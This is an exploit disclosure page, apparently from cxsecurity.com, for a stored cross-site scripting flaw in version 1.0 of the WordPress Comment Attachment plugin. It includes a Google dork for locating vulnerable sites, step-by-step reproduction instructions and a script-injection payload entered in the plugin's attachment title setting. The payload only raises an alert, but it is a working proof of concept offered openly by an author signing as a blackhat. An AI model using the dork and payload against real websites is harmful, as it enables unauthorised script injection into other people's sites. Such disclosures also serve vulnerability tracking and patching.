WordPress Comment Attachment 1.0 <= Cross Site Scripting

2013.09.21
Credit: Arsan
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: inurl:\"/comment-attachment/comment-attachment.php\"

#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # Exploit Title: WordPress Comment Attachment 1.0 <= Cross Site Scripting # Date: 2013 20 September # Author: Arsan # Software Link: http://wordpress.org/plugins/comment-attachment/ # Version : 1.0 # Tested on: Linux & Windows # Category: webapps # Google Dork : inurl:"/comment-attachment/comment-attachment.php" # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Exploit : # # [-] Description : # # 1) Download "Comment Attachment" And Install # 2) Go To Sitting Comment Attachment : # Settings > Discussion > Comment Attachment # 3) Insert In "Attachment field title" This Code And Save : # "><script>alert(/Arsan/)</script> # 4) And Try To See Your Post And Comment; Follow Link : # http://localhost/wp/?p=1 # # [You See Alert "Arsan"] ~> ;) # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Contact Me : # # Arsan.Blackhat@gmail.com # Twitter.com/ArsanBlackhat # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # I L0ve Inj3ct0r Team #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top